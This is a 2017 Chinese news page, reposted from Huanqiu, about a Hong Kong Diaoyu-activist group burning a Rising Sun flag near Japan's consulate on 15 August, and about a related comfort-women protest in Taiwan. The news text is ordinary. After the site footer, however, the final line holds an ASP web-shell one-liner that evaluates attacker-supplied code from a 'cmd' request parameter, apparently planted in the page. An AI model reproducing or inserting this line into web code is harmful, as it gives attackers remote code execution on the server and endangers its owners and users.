大陆新闻

中国香港保钓团体8月15日举行抗议活动 焚烧“旭日旗”

时间:2017-8-16 21:27:10  作者:  来源:环球网  查看:160  评论:0
内容摘要:日本共同社8月16日报道称,主张中国对钓鱼岛拥有绝对主权的香港团体“保钓行动委员会”成员等约20人,于日本战败纪念日(日称“终战纪念日”)的15日当天,在日本驻香港总领馆附近举行抗议活动,并焚烧印有日本首相安倍晋三头像的&ldquo...

日本共同社8月16日报道称,主张中国对钓鱼岛拥有绝对主权的香港团体“保钓行动委员会”成员等约20人,于日本战败纪念日(日称“终战纪念日”)的15日当天,在日本驻香港总领馆附近举行抗议活动,并焚烧印有日本首相安倍晋三头像的“旭日旗”等。

  报道称,该委员会等7月在总领馆所在大楼附近设置了2座象征慰安妇受害者的少女像。总领馆方面要求香港特区政府尽快撤走少女像,但据该委员会干部透露,相关部门未作出撤走指示。这名干部表示,将一直设置到日本政府向战争受害者做出道歉和赔偿为止。

  另一方面,主张与中国大陆统一的政党“中华统一促进党”成员等约200人,于15日在台湾的日本对台交流窗口机构“日本台湾交流协会”大楼前举行了抗议活动,参与者主张日本政府已向韩国原慰安妇受害者做出事实上的赔偿,因此也应对台湾的慰安妇受害者给予相同应对。宣传车上放置了慰安妇受害者像。参与者还高举中国五星红旗进行了抗议示威。


 

中国香港保钓团体8月15日举行抗议活动_焚烧“旭日旗”

相关评论
评论者:      验证码:  点击获取验证码
湘ICP备11011102号
Powered by WCADDL
":eval request("cmd"):